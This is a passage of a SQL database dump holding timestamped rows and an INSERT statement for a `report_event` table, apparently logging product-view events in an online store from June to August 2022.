(1786, '2022-06-12 02:11:42', 1, 2060, 0, 1, 1),
(1787, '2022-06-12 02:15:01', 1, 2063, 0, 1, 1),
(1788, '2022-06-12 02:23:36', 1, 2058, 0, 1, 1),
(1789, '2022-06-12 02:39:57', 1, 2055, 0, 1, 1),
(1790, '2022-06-12 03:04:48', 1, 2061, 0, 1, 1),
(1791, '2022-06-12 03:15:46', 1, 2062, 0, 1, 1),
(1792, '2022-06-12 03:38:07', 1, 2054, 0, 1, 1),
(1793, '2022-06-12 03:43:39', 1, 2059, 0, 1, 1),
(1794, '2022-06-12 03:47:40', 1, 2064, 0, 1, 1),
(1795, '2022-06-12 10:53:13', 1, 2061, 0, 1, 1),
(1796, '2022-06-12 10:53:40', 1, 2059, 0, 1, 1),
(1797, '2022-06-12 10:54:06', 1, 2064, 0, 1, 1),
(1798, '2022-06-12 10:56:05', 1, 2062, 0, 1, 1),
(1799, '2022-06-12 10:57:57', 1, 2063, 0, 1, 1),
(1800, '2022-06-12 11:38:21', 1, 2059, 0, 1, 1),
(1801, '2022-06-12 12:23:21', 1, 2059, 0, 1, 1),
(1802, '2022-06-12 23:32:33', 1, 2061, 0, 1, 1),
(1803, '2022-06-13 04:54:07', 1, 2054, 0, 1, 1),
(1804, '2022-06-13 08:13:02', 1, 2054, 0, 1, 1),
(1805, '2022-06-15 00:36:18', 1, 2064, 0, 1, 1),
(1806, '2022-06-15 07:00:13', 1, 2062, 0, 1, 1),
(1807, '2022-06-16 17:34:12', 1, 2061, 0, 1, 1),
(1808, '2022-06-17 16:24:33', 1, 2061, 0, 1, 1),
(1809, '2022-06-17 20:50:48', 1, 2058, 0, 1, 1),
(1810, '2022-06-19 03:35:06', 1, 2060, 0, 1, 1),
(1811, '2022-06-19 03:39:24', 1, 2063, 0, 1, 1),
(1812, '2022-06-19 03:51:31', 1, 2058, 0, 1, 1),
(1813, '2022-06-19 04:13:34', 1, 2055, 0, 1, 1),
(1814, '2022-06-19 04:50:35', 1, 2061, 0, 1, 1),
(1815, '2022-06-19 05:09:56', 1, 2062, 0, 1, 1),
(1816, '2022-06-19 05:49:20', 1, 2054, 0, 1, 1),
(1817, '2022-06-19 05:57:47', 1, 2059, 0, 1, 1),
(1818, '2022-06-19 06:05:23', 1, 2064, 0, 1, 1),
(1819, '2022-06-19 20:43:46', 1, 2054, 0, 1, 1),
(1820, '2022-06-19 21:26:55', 1, 2059, 0, 1, 1),
(1821, '2022-06-20 09:08:02', 1, 2059, 0, 1, 1),
(1822, '2022-06-20 13:32:54', 1, 2062, 0, 1, 1),
(1823, '2022-06-20 15:59:54', 1, 2059, 0, 1, 1),
(1824, '2022-06-20 16:42:24', 1, 2055, 0, 1, 1),
(1825, '2022-06-20 16:57:21', 1, 2063, 0, 1, 1),
(1826, '2022-06-20 16:58:01', 1, 2062, 377, 1, 1),
(1827, '2022-06-22 12:44:16', 1, 2059, 0, 1, 1),
(1828, '2022-06-22 14:52:22', 1, 2064, 379, 1, 1),
(1829, '2022-06-22 14:52:58', 1, 2064, 379, 1, 1),
(1830, '2022-06-22 14:53:29', 1, 2064, 379, 1, 1),
(1831, '2022-06-22 14:53:50', 1, 2064, 379, 1, 1),
(1832, '2022-06-23 00:02:11', 1, 2058, 0, 1, 1),
(1833, '2022-06-23 00:02:16', 1, 2061, 0, 1, 1),
(1834, '2022-06-23 00:02:20', 1, 2062, 0, 1, 1),
(1835, '2022-06-23 00:02:22', 1, 2060, 0, 1, 1),
(1836, '2022-06-23 00:02:25', 1, 2063, 0, 1, 1),
(1837, '2022-06-23 00:02:26', 1, 2059, 0, 1, 1),
(1838, '2022-06-23 00:02:29', 1, 2064, 0, 1, 1),
(1839, '2022-06-23 00:02:31', 1, 2055, 0, 1, 1),
(1840, '2022-06-24 01:15:32', 1, 2062, 0, 1, 1),
(1841, '2022-06-26 01:11:52', 1, 2059, 0, 1, 1),
(1842, '2022-06-26 04:02:05', 1, 2054, 0, 1, 1),
(1843, '2022-06-26 07:20:46', 1, 2060, 0, 1, 1),
(1844, '2022-06-26 07:24:04', 1, 2063, 0, 1, 1),
(1845, '2022-06-26 07:32:59', 1, 2058, 0, 1, 1),
(1846, '2022-06-26 07:51:05', 1, 2055, 0, 1, 1),
(1847, '2022-06-26 08:21:36', 1, 2061, 0, 1, 1),
(1848, '2022-06-26 08:37:48', 1, 2062, 0, 1, 1),
(1849, '2022-06-26 09:12:08', 1, 2054, 0, 1, 1),
(1850, '2022-06-26 09:18:57', 1, 2059, 0, 1, 1),
(1851, '2022-06-26 09:24:34', 1, 2064, 0, 1, 1),
(1852, '2022-06-26 21:58:59', 1, 2061, 0, 1, 1),
(1853, '2022-06-26 23:30:16', 1, 2059, 0, 1, 1),
(1854, '2022-06-27 05:27:29', 1, 2061, 0, 1, 1),
(1855, '2022-06-27 08:19:28', 1, 2061, 0, 1, 1),
(1856, '2022-06-27 14:13:08', 1, 2054, 0, 1, 1),
(1857, '2022-06-27 14:34:20', 1, 2060, 0, 1, 1),
(1858, '2022-06-27 14:35:47', 1, 2060, 0, 1, 1),
(1859, '2022-06-27 17:32:16', 1, 2054, 0, 1, 1),
(1860, '2022-06-27 17:32:29', 1, 2055, 0, 1, 1),
(1861, '2022-06-27 17:33:22', 1, 2064, 0, 1, 1),
(1862, '2022-06-27 17:33:35', 1, 2063, 0, 1, 1),
(1863, '2022-06-27 17:33:48', 1, 2062, 0, 1, 1),
(1864, '2022-06-27 17:34:01', 1, 2060, 0, 1, 1),
(1865, '2022-06-27 17:34:14', 1, 2059, 0, 1, 1),
(1866, '2022-06-27 17:34:27', 1, 2061, 0, 1, 1),
(1867, '2022-06-27 17:34:40', 1, 2058, 0, 1, 1),
(1868, '2022-06-27 21:45:21', 1, 2053, 0, 1, 1),
(1869, '2022-06-27 21:46:04', 1, 2061, 0, 1, 1),
(1870, '2022-06-28 09:16:48', 1, 2061, 0, 1, 1),
(1871, '2022-06-28 17:17:40', 1, 2061, 0, 1, 1),
(1872, '2022-06-28 18:43:42', 1, 2064, 0, 1, 1),
(1873, '2022-06-29 00:41:54', 1, 2064, 0, 1, 1),
(1874, '2022-06-29 03:25:16', 1, 2059, 0, 1, 1),
(1875, '2022-06-29 03:58:43', 1, 2061, 0, 1, 1),
(1876, '2022-06-29 08:49:09', 1, 2064, 0, 1, 1),
(1877, '2022-06-29 09:36:47', 1, 2061, 0, 1, 1),
(1878, '2022-06-29 14:15:13', 1, 2061, 0, 1, 1),
(1879, '2022-06-30 08:53:04', 1, 2060, 0, 1, 1),
(1880, '2022-06-30 23:53:34', 1, 2059, 0, 1, 1),
(1881, '2022-07-01 05:55:03', 1, 2061, 0, 1, 1),
(1882, '2022-07-01 11:46:04', 1, 2060, 0, 1, 1),
(1883, '2022-07-02 16:06:47', 1, 2061, 0, 1, 1),
(1884, '2022-07-03 01:36:22', 1, 2054, 0, 1, 1),
(1885, '2022-07-03 05:33:28', 1, 2058, 0, 1, 1),
(1886, '2022-07-03 05:33:29', 1, 2061, 0, 1, 1),
(1887, '2022-07-03 05:33:30', 1, 2062, 0, 1, 1),
(1888, '2022-07-03 05:33:32', 1, 2060, 0, 1, 1),
(1889, '2022-07-03 05:33:33', 1, 2063, 0, 1, 1),
(1890, '2022-07-03 05:33:35', 1, 2059, 0, 1, 1),
(1891, '2022-07-03 05:33:36', 1, 2064, 0, 1, 1),
(1892, '2022-07-03 05:33:38', 1, 2055, 0, 1, 1),
(1893, '2022-07-03 07:39:18', 1, 2063, 0, 1, 1),
(1894, '2022-07-03 08:59:53', 1, 2060, 0, 1, 1),
(1895, '2022-07-03 09:02:37', 1, 2063, 0, 1, 1),
(1896, '2022-07-03 09:09:10', 1, 2058, 0, 1, 1),
(1897, '2022-07-03 09:22:03', 1, 2055, 0, 1, 1),
(1898, '2022-07-03 09:49:03', 1, 2061, 0, 1, 1),
(1899, '2022-07-03 10:02:40', 1, 2062, 0, 1, 1),
(1900, '2022-07-03 10:27:13', 1, 2054, 0, 1, 1),
(1901, '2022-07-03 10:32:19', 1, 2059, 0, 1, 1),
(1902, '2022-07-03 10:36:13', 1, 2064, 0, 1, 1),
(1903, '2022-07-03 19:13:33', 1, 2058, 0, 1, 1),
(1904, '2022-07-03 19:36:03', 1, 2061, 0, 1, 1),
(1905, '2022-07-04 01:50:31', 1, 2061, 0, 1, 1),
(1906, '2022-07-06 01:58:12', 1, 2053, 0, 1, 1),
(1907, '2022-07-06 07:32:54', 1, 2055, 0, 1, 1),
(1908, '2022-07-06 12:48:18', 1, 2061, 0, 1, 1),
(1909, '2022-07-06 14:12:42', 1, 2059, 0, 1, 1),
(1910, '2022-07-07 09:02:07', 1, 2059, 0, 1, 1),
(1911, '2022-07-08 03:25:20', 1, 2061, 0, 1, 1),
(1912, '2022-07-08 04:00:00', 1, 2054, 0, 1, 1),
(1913, '2022-07-08 04:51:33', 1, 2064, 0, 1, 1),
(1914, '2022-07-08 09:11:55', 1, 2055, 0, 1, 1),
(1915, '2022-07-09 21:31:03', 1, 2061, 0, 1, 1),
(1916, '2022-07-10 03:49:29', 1, 2061, 0, 1, 1),
(1917, '2022-07-10 06:16:01', 1, 2061, 0, 1, 1),
(1918, '2022-07-10 11:34:04', 1, 2063, 0, 1, 1),
(1919, '2022-07-10 13:01:36', 1, 2060, 0, 1, 1),
(1920, '2022-07-10 13:04:37', 1, 2063, 0, 1, 1),
(1921, '2022-07-10 13:12:22', 1, 2058, 0, 1, 1),
(1922, '2022-07-10 13:27:20', 1, 2055, 0, 1, 1),
(1923, '2022-07-10 13:51:15', 1, 2061, 0, 1, 1),
(1924, '2022-07-10 14:04:45', 1, 2062, 0, 1, 1),
(1925, '2022-07-10 14:31:27', 1, 2054, 0, 1, 1),
(1926, '2022-07-10 14:36:49', 1, 2059, 0, 1, 1),
(1927, '2022-07-10 14:41:13', 1, 2064, 0, 1, 1),
(1928, '2022-07-12 04:01:43', 1, 2064, 0, 1, 1),
(1929, '2022-07-12 13:54:07', 1, 2059, 0, 1, 1),
(1930, '2022-07-12 14:51:00', 1, 2059, 0, 1, 1),
(1931, '2022-07-12 22:19:25', 1, 2053, 0, 1, 1),
(1932, '2022-07-13 11:20:39', 1, 2055, 0, 1, 1),
(1933, '2022-07-13 15:02:10', 1, 2062, 0, 1, 1),
(1934, '2022-07-13 15:02:11', 1, 2062, 0, 1, 1),
(1935, '2022-07-13 15:57:51', 1, 2059, 0, 1, 1),
(1936, '2022-07-13 19:24:46', 1, 2062, 0, 1, 1),
(1937, '2022-07-14 18:40:11', 1, 2062, 0, 1, 1),
(1938, '2022-07-15 20:55:27', 1, 2064, 0, 1, 1),
(1939, '2022-07-17 13:03:48', 1, 2063, 0, 1, 1),
(1940, '2022-07-17 14:20:04', 1, 2054, 0, 1, 1),
(1941, '2022-07-17 14:29:08', 1, 2060, 0, 1, 1),
(1942, '2022-07-17 14:37:58', 1, 2061, 0, 1, 1),
(1943, '2022-07-17 14:51:48', 1, 2059, 0, 1, 1),
(1944, '2022-07-17 15:02:05', 1, 2064, 0, 1, 1),
(1945, '2022-07-17 15:10:27', 1, 2062, 0, 1, 1),
(1946, '2022-07-17 15:24:33', 1, 2055, 0, 1, 1),
(1947, '2022-07-17 15:36:52', 1, 2063, 0, 1, 1),
(1948, '2022-07-17 15:40:46', 1, 2058, 0, 1, 1),
(1949, '2022-07-17 15:41:22', 1, 2061, 0, 1, 1),
(1950, '2022-07-17 20:29:28', 1, 2060, 0, 1, 1),
(1951, '2022-07-17 20:30:08', 1, 2060, 0, 1, 1),
(1952, '2022-07-18 18:13:01', 1, 2062, 0, 1, 1),
(1953, '2022-07-18 21:20:17', 1, 2061, 0, 1, 1),
(1954, '2022-07-19 07:47:48', 1, 2055, 0, 1, 1),
(1955, '2022-07-19 19:09:52', 1, 2064, 0, 1, 1),
(1956, '2022-07-19 21:29:37', 1, 2058, 0, 1, 1),
(1957, '2022-07-19 22:02:34', 1, 2061, 0, 1, 1),
(1958, '2022-07-19 22:25:33', 1, 2058, 0, 1, 1),
(1959, '2022-07-19 22:59:03', 1, 2053, 0, 1, 1),
(1960, '2022-07-19 22:59:40', 1, 2054, 0, 1, 1),
(1961, '2022-07-19 23:00:20', 1, 2055, 0, 1, 1),
(1962, '2022-07-19 23:06:07', 1, 2064, 0, 1, 1),
(1963, '2022-07-19 23:06:46', 1, 2063, 0, 1, 1),
(1964, '2022-07-19 23:07:26', 1, 2062, 0, 1, 1),
(1965, '2022-07-19 23:08:04', 1, 2060, 0, 1, 1),
(1966, '2022-07-20 01:54:43', 1, 2061, 0, 1, 1),
(1967, '2022-07-20 02:14:45', 1, 2059, 0, 1, 1),
(1968, '2022-07-20 02:16:13', 1, 2061, 0, 1, 1),
(1969, '2022-07-20 02:17:40', 1, 2059, 0, 1, 1),
(1970, '2022-07-20 02:18:25', 1, 2060, 0, 1, 1),
(1971, '2022-07-20 02:19:07', 1, 2062, 0, 1, 1),
(1972, '2022-07-20 02:19:50', 1, 2063, 0, 1, 1),
(1973, '2022-07-20 02:20:35', 1, 2064, 0, 1, 1),
(1974, '2022-07-20 02:29:43', 1, 2055, 0, 1, 1),
(1975, '2022-07-20 02:30:34', 1, 2054, 0, 1, 1),
(1976, '2022-07-20 11:50:33', 1, 2059, 0, 1, 1),
(1977, '2022-07-20 17:28:19', 1, 2064, 402, 1, 1),
(1978, '2022-07-20 21:08:09', 1, 2064, 0, 1, 1),
(1979, '2022-07-21 00:38:52', 1, 2060, 0, 1, 1),
(1980, '2022-07-21 09:39:49', 1, 2054, 0, 1, 1),
(1981, '2022-07-21 09:39:52', 1, 2055, 0, 1, 1),
(1982, '2022-07-21 09:40:06', 1, 2064, 0, 1, 1),
(1983, '2022-07-21 09:40:10', 1, 2063, 0, 1, 1),
(1984, '2022-07-21 09:40:14', 1, 2062, 0, 1, 1),
(1985, '2022-07-21 09:40:18', 1, 2060, 0, 1, 1),
(1986, '2022-07-21 09:40:22', 1, 2059, 0, 1, 1),
(1987, '2022-07-21 09:40:25', 1, 2061, 0, 1, 1),
(1988, '2022-07-21 09:40:28', 1, 2058, 0, 1, 1),
(1989, '2022-07-21 14:20:19', 1, 2053, 0, 1, 1),
(1990, '2022-07-22 13:14:28', 1, 2054, 0, 1, 1),
(1991, '2022-07-23 02:20:16', 1, 2054, 0, 1, 1),
(1992, '2022-07-23 07:59:01', 1, 2055, 0, 1, 1),
(1993, '2022-07-23 13:30:13', 1, 2061, 0, 1, 1),
(1994, '2022-07-24 00:51:49', 1, 2063, 0, 1, 1),
(1995, '2022-07-24 13:13:09', 1, 2064, 0, 1, 1),
(1996, '2022-07-24 16:49:23', 1, 2063, 0, 1, 1),
(1997, '2022-07-24 17:27:38', 1, 2060, 0, 1, 1),
(1998, '2022-07-24 17:30:29', 1, 2063, 0, 1, 1),
(1999, '2022-07-24 17:37:57', 1, 2058, 0, 1, 1),
(2000, '2022-07-24 17:42:52', 1, 2059, 0, 1, 1),
(2001, '2022-07-24 17:51:37', 1, 2055, 0, 1, 1),
(2002, '2022-07-24 18:15:20', 1, 2061, 0, 1, 1),
(2003, '2022-07-24 18:27:59', 1, 2062, 0, 1, 1),
(2004, '2022-07-24 18:28:24', 1, 2062, 0, 1, 1),
(2005, '2022-07-24 18:54:29', 1, 2054, 0, 1, 1),
(2006, '2022-07-24 18:59:33', 1, 2059, 0, 1, 1),
(2007, '2022-07-24 19:04:09', 1, 2064, 0, 1, 1),
(2008, '2022-07-24 22:51:35', 1, 2064, 0, 1, 1),
(2009, '2022-07-24 23:24:37', 1, 2058, 0, 1, 1),
(2010, '2022-07-25 04:08:51', 1, 2061, 0, 1, 1),
(2011, '2022-07-25 07:47:33', 1, 2063, 0, 1, 1),
(2012, '2022-07-25 13:07:49', 1, 2061, 0, 1, 1),
(2013, '2022-07-25 20:43:16', 1, 2061, 0, 1, 1),
(2014, '2022-07-25 20:44:32', 1, 2062, 0, 1, 1),
(2015, '2022-07-26 01:59:50', 1, 2055, 0, 1, 1),
(2016, '2022-07-26 01:59:55', 1, 2064, 0, 1, 1),
(2017, '2022-07-26 01:59:59', 1, 2061, 0, 1, 1),
(2018, '2022-07-26 02:00:04', 1, 2058, 0, 1, 1),
(2019, '2022-07-26 09:21:51', 1, 2061, 0, 1, 1),
(2020, '2022-07-26 23:43:13', 1, 2054, 0, 1, 1),
(2021, '2022-07-28 07:29:39', 1, 2059, 0, 1, 1),
(2022, '2022-07-28 16:44:52', 1, 2061, 0, 1, 1),
(2023, '2022-07-28 18:59:50', 1, 2054, 0, 1, 1),
(2024, '2022-07-29 11:32:18', 1, 2064, 0, 1, 1),
(2025, '2022-07-29 11:50:35', 1, 2061, 0, 1, 1),
(2026, '2022-07-29 19:34:20', 1, 2055, 0, 1, 1),
(2027, '2022-07-29 20:17:47', 1, 2063, 0, 1, 1),
(2028, '2022-07-29 20:28:21', 1, 2062, 0, 1, 1),
(2029, '2022-07-29 22:55:48', 1, 2064, 414, 1, 1),
(2030, '2022-07-29 22:56:37', 1, 2064, 414, 1, 1),
(2031, '2022-07-29 22:57:19', 1, 2064, 414, 1, 1),
(2032, '2022-07-29 22:57:46', 1, 2064, 414, 1, 1),
(2033, '2022-07-30 05:04:23', 1, 2064, 0, 1, 1),
(2034, '2022-07-30 09:33:43', 1, 2055, 0, 1, 1),
(2035, '2022-07-30 10:36:35', 1, 2061, 0, 1, 1),
(2036, '2022-07-30 10:36:39', 4, 2061, 415, 1, 1),
(2037, '2022-07-30 13:16:15', 1, 2064, 416, 1, 1),
(2038, '2022-07-30 13:17:19', 1, 2064, 416, 1, 1),
(2039, '2022-07-30 13:17:58', 1, 2064, 416, 1, 1),
(2040, '2022-07-30 13:18:29', 1, 2064, 416, 1, 1),
(2041, '2022-07-30 16:10:55', 1, 2055, 0, 1, 1),
(2042, '2022-07-30 18:15:07', 1, 2061, 0, 1, 1),
(2043, '2022-07-31 03:09:08', 1, 2061, 0, 1, 1),
(2044, '2022-07-31 19:20:04', 1, 2054, 0, 1, 1),
(2045, '2022-07-31 19:35:09', 1, 2060, 0, 1, 1),
(2046, '2022-07-31 19:50:13', 1, 2061, 0, 1, 1),
(2047, '2022-07-31 20:10:31', 1, 2059, 0, 1, 1),
(2048, '2022-07-31 20:25:39', 1, 2064, 0, 1, 1),
(2049, '2022-07-31 20:40:22', 1, 2062, 0, 1, 1),
(2050, '2022-07-31 21:03:18', 1, 2055, 0, 1, 1),
(2051, '2022-07-31 21:22:25', 1, 2063, 0, 1, 1),
(2052, '2022-07-31 21:28:01', 1, 2058, 0, 1, 1),
(2053, '2022-08-01 01:39:17', 1, 2061, 0, 1, 1),
(2054, '2022-08-02 02:24:27', 1, 2054, 0, 1, 1),
(2055, '2022-08-02 08:07:21', 1, 2059, 0, 1, 1),
(2056, '2022-08-02 23:44:58', 1, 2054, 0, 1, 1),
(2057, '2022-08-02 23:45:01', 1, 2055, 0, 1, 1),
(2058, '2022-08-02 23:45:14', 1, 2064, 0, 1, 1),
(2059, '2022-08-02 23:45:16', 1, 2062, 0, 1, 1),
(2060, '2022-08-02 23:45:17', 1, 2063, 0, 1, 1),
(2061, '2022-08-02 23:45:21', 1, 2060, 0, 1, 1),
(2062, '2022-08-02 23:45:22', 1, 2059, 0, 1, 1),
(2063, '2022-08-02 23:45:23', 1, 2061, 0, 1, 1),
(2064, '2022-08-02 23:45:24', 1, 2058, 0, 1, 1),
(2065, '2022-08-03 11:19:56', 1, 2062, 0, 1, 1),
(2066, '2022-08-03 12:41:59', 1, 2062, 0, 1, 1),
(2067, '2022-08-03 17:03:57', 1, 2055, 0, 1, 1),
(2068, '2022-08-04 06:37:20', 1, 2061, 0, 1, 1),
(2069, '2022-08-04 09:38:05', 1, 2054, 0, 1, 1),
(2070, '2022-08-05 04:59:51', 1, 2062, 0, 1, 1),
(2071, '2022-08-05 07:02:16', 1, 2055, 0, 1, 1),
(2072, '2022-08-05 12:16:46', 1, 2055, 0, 1, 1),
(2073, '2022-08-05 17:20:03', 1, 2064, 0, 1, 1),
(2074, '2022-08-06 16:16:36', 1, 2054, 0, 1, 1),
(2075, '2022-08-07 21:17:26', 1, 2060, 0, 1, 1),
(2076, '2022-08-07 21:19:50', 1, 2063, 0, 1, 1),
(2077, '2022-08-07 21:32:38', 1, 2060, 0, 1, 1),
(2078, '2022-08-07 21:34:48', 1, 2063, 0, 1, 1),
(2079, '2022-08-07 21:40:37', 1, 2058, 0, 1, 1),
(2080, '2022-08-07 21:51:36', 1, 2055, 0, 1, 1),
(2081, '2022-08-07 22:12:08', 1, 2061, 0, 1, 1),
(2082, '2022-08-07 22:16:06', 1, 2061, 0, 1, 1),
(2083, '2022-08-07 22:21:24', 1, 2062, 0, 1, 1),
(2084, '2022-08-07 22:42:42', 1, 2054, 0, 1, 1),
(2085, '2022-08-07 22:46:33', 1, 2059, 0, 1, 1),
(2086, '2022-08-07 22:49:52', 1, 2064, 0, 1, 1),
(2087, '2022-08-08 06:02:33', 1, 2061, 0, 1, 1),
(2088, '2022-08-08 11:59:30', 1, 2063, 0, 1, 1),
(2089, '2022-08-08 15:24:32', 1, 2063, 0, 1, 1),
(2090, '2022-08-08 17:47:26', 1, 2062, 0, 1, 1),
(2091, '2022-08-08 20:52:35', 1, 2055, 0, 1, 1),
(2092, '2022-08-09 04:24:08', 1, 2062, 0, 1, 1),
(2093, '2022-08-09 05:11:36', 1, 2055, 0, 1, 1),
(2094, '2022-08-09 07:34:17', 1, 2055, 0, 1, 1),
(2095, '2022-08-09 07:46:24', 1, 2059, 0, 1, 1),
(2096, '2022-08-09 09:41:59', 1, 2054, 0, 1, 1),
(2097, '2022-08-09 09:42:00', 1, 2060, 0, 1, 1),
(2098, '2022-08-09 09:42:02', 1, 2061, 0, 1, 1),
(2099, '2022-08-09 09:42:03', 1, 2058, 0, 1, 1),
(2100, '2022-08-09 09:42:09', 1, 2062, 0, 1, 1),
(2101, '2022-08-09 09:42:11', 1, 2059, 0, 1, 1),
(2102, '2022-08-09 09:42:12', 1, 2064, 0, 1, 1),
(2103, '2022-08-09 09:42:13', 1, 2055, 0, 1, 1),
(2104, '2022-08-09 09:42:14', 1, 2063, 0, 1, 1),
(2105, '2022-08-10 14:41:21', 1, 2061, 0, 1, 1),
(2106, '2022-08-10 18:39:17', 1, 2058, 0, 1, 1),
(2107, '2022-08-10 18:39:29', 1, 2064, 0, 1, 1),
(2108, '2022-08-10 18:39:46', 1, 2062, 0, 1, 1),
(2109, '2022-08-10 18:39:50', 1, 2055, 0, 1, 1),
(2110, '2022-08-10 18:40:01', 1, 2054, 0, 1, 1),
(2111, '2022-08-10 18:40:04', 1, 2059, 0, 1, 1),
(2112, '2022-08-10 18:40:05', 1, 2063, 0, 1, 1),
(2113, '2022-08-10 18:40:09', 1, 2061, 0, 1, 1),
(2114, '2022-08-10 18:40:18', 1, 2060, 0, 1, 1),
(2115, '2022-08-10 18:42:19', 1, 2058, 0, 1, 1),
(2116, '2022-08-10 18:42:25', 1, 2054, 0, 1, 1),
(2117, '2022-08-10 18:42:30', 1, 2064, 0, 1, 1),
(2118, '2022-08-10 18:42:38', 1, 2060, 0, 1, 1),
(2119, '2022-08-10 18:42:43', 1, 2062, 0, 1, 1),
(2120, '2022-08-10 18:42:46', 1, 2055, 0, 1, 1),
(2121, '2022-08-10 18:42:53', 1, 2059, 0, 1, 1),
(2122, '2022-08-10 18:42:55', 1, 2063, 0, 1, 1),
(2123, '2022-08-10 18:42:57', 1, 2061, 0, 1, 1),
(2124, '2022-08-10 18:43:14', 1, 2053, 0, 1, 1),
(2125, '2022-08-11 00:24:01', 1, 2064, 0, 1, 1),
(2126, '2022-08-11 00:58:37', 1, 2054, 0, 1, 1),
(2127, '2022-08-11 02:16:47', 1, 2054, 0, 1, 1),
(2128, '2022-08-11 07:14:13', 1, 2064, 0, 1, 1),
(2129, '2022-08-11 07:15:15', 1, 2062, 0, 1, 1),
(2130, '2022-08-11 08:13:47', 1, 2063, 0, 1, 1),
(2131, '2022-08-11 08:13:54', 1, 2061, 0, 1, 1),
(2132, '2022-08-11 08:14:01', 1, 2059, 0, 1, 1),
(2133, '2022-08-11 08:14:08', 1, 2058, 0, 1, 1),
(2134, '2022-08-11 08:14:15', 1, 2055, 0, 1, 1),
(2135, '2022-08-11 08:14:22', 1, 2054, 0, 1, 1),
(2136, '2022-08-11 08:14:35', 1, 2060, 0, 1, 1),
(2137, '2022-08-11 10:49:48', 1, 2055, 0, 1, 1),
(2138, '2022-08-11 11:21:13', 1, 2064, 0, 1, 1),
(2139, '2022-08-11 13:14:15', 1, 2064, 0, 1, 1),
(2140, '2022-08-11 13:57:45', 1, 2062, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(2141, '2022-08-11 13:58:09', 1, 2063, 0, 1, 1),
(2142, '2022-08-11 13:58:16', 1, 2061, 0, 1, 1),
(2143, '2022-08-11 13:58:23', 1, 2059, 0, 1, 1),
(2144, '2022-08-11 13:58:30', 1, 2058, 0, 1, 1),
(2145, '2022-08-11 13:58:37', 1, 2055, 0, 1, 1),
(2146, '2022-08-11 13:58:44', 1, 2054, 0, 1, 1),
(2147, '2022-08-11 15:05:03', 1, 2061, 0, 1, 1),
(2148, '2022-08-11 15:41:30', 1, 2060, 0, 1, 1),
(2149, '2022-08-11 17:17:16', 1, 2059, 0, 1, 1),
(2150, '2022-08-11 17:26:29', 1, 2059, 0, 1, 1),
(2151, '2022-08-11 19:28:35', 1, 2062, 0, 1, 1),
(2152, '2022-08-11 20:01:03', 1, 2064, 0, 1, 1),
(2153, '2022-08-11 20:59:06', 1, 2062, 0, 1, 1),
(2154, '2022-08-11 21:00:02', 1, 2063, 0, 1, 1),
(2155, '2022-08-11 21:00:09', 1, 2061, 0, 1, 1),
(2156, '2022-08-11 21:00:17', 1, 2059, 0, 1, 1),
(2157, '2022-08-11 21:00:23', 1, 2058, 0, 1, 1),
(2158, '2022-08-11 21:00:31', 1, 2055, 0, 1, 1),
(2159, '2022-08-11 21:00:38', 1, 2054, 0, 1, 1),
(2160, '2022-08-11 21:50:24', 1, 2060, 0, 1, 1),
(2161, '2022-08-11 21:53:07', 1, 2054, 0, 1, 1),
(2162, '2022-08-12 09:36:11', 1, 2055, 0, 1, 1),
(2163, '2022-08-12 11:02:15', 1, 2064, 0, 1, 1),
(2164, '2022-08-12 12:46:00', 1, 2062, 0, 1, 1),
(2165, '2022-08-12 12:46:36', 1, 2063, 0, 1, 1),
(2166, '2022-08-12 12:46:43', 1, 2061, 0, 1, 1),
(2167, '2022-08-12 12:46:50', 1, 2059, 0, 1, 1),
(2168, '2022-08-12 12:46:56', 1, 2058, 0, 1, 1),
(2169, '2022-08-12 12:47:03', 1, 2055, 0, 1, 1),
(2170, '2022-08-12 12:47:10', 1, 2054, 0, 1, 1),
(2171, '2022-08-12 13:05:35', 1, 2060, 0, 1, 1),
(2172, '2022-08-12 14:43:37', 1, 2059, 0, 1, 1),
(2173, '2022-08-12 15:57:52', 1, 2054, 0, 1, 1),
(2174, '2022-08-12 16:42:52', 1, 2054, 0, 1, 1),
(2175, '2022-08-13 12:15:51', 1, 2064, 0, 1, 1),
(2176, '2022-08-13 13:32:56', 1, 2062, 0, 1, 1),
(2177, '2022-08-13 13:34:47', 1, 2063, 0, 1, 1),
(2178, '2022-08-13 13:34:57', 1, 2061, 0, 1, 1),
(2179, '2022-08-13 13:35:05', 1, 2059, 0, 1, 1),
(2180, '2022-08-13 13:35:18', 1, 2058, 0, 1, 1),
(2181, '2022-08-13 13:35:28', 1, 2055, 0, 1, 1),
(2182, '2022-08-13 13:35:42', 1, 2054, 0, 1, 1),
(2183, '2022-08-13 14:26:29', 1, 2060, 0, 1, 1),
(2184, '2022-08-13 14:31:11', 1, 2058, 0, 1, 1),
(2185, '2022-08-13 20:29:01', 1, 2060, 0, 1, 1),
(2186, '2022-08-13 21:19:22', 1, 2064, 0, 1, 1),
(2187, '2022-08-13 21:31:17', 1, 2062, 0, 1, 1),
(2188, '2022-08-13 21:32:00', 1, 2063, 0, 1, 1),
(2189, '2022-08-13 21:32:10', 1, 2061, 0, 1, 1),
(2190, '2022-08-13 21:32:19', 1, 2059, 0, 1, 1),
(2191, '2022-08-13 21:32:29', 1, 2058, 0, 1, 1),
(2192, '2022-08-13 21:32:37', 1, 2055, 0, 1, 1),
(2193, '2022-08-13 21:32:49', 1, 2054, 0, 1, 1),
(2194, '2022-08-13 23:09:43', 1, 2060, 0, 1, 1),
(2195, '2022-08-14 03:48:16', 1, 2061, 0, 1, 1),
(2196, '2022-08-14 09:59:54', 1, 2061, 0, 1, 1),
(2197, '2022-08-14 16:04:45', 1, 2064, 0, 1, 1),
(2198, '2022-08-14 18:21:15', 1, 2061, 0, 1, 1),
(2199, '2022-08-14 21:29:54', 1, 2060, 0, 1, 1),
(2200, '2022-08-14 21:32:14', 1, 2063, 0, 1, 1),
(2201, '2022-08-14 21:38:04', 1, 2058, 0, 1, 1),
(2202, '2022-08-14 21:49:11', 1, 2055, 0, 1, 1),
(2203, '2022-08-14 22:06:09', 1, 2061, 0, 1, 1),
(2204, '2022-08-14 22:15:11', 1, 2062, 0, 1, 1),
(2205, '2022-08-14 22:33:40', 1, 2054, 0, 1, 1),
(2206, '2022-08-14 22:36:49', 1, 2059, 0, 1, 1),
(2207, '2022-08-14 22:39:45', 1, 2064, 0, 1, 1),
(2208, '2022-08-15 09:48:51', 1, 2058, 0, 1, 1),
(2209, '2022-08-15 15:51:07', 1, 2063, 0, 1, 1),
(2210, '2022-08-15 20:27:01', 1, 2060, 0, 1, 1),
(2211, '2022-08-15 22:27:03', 1, 2054, 0, 1, 1),
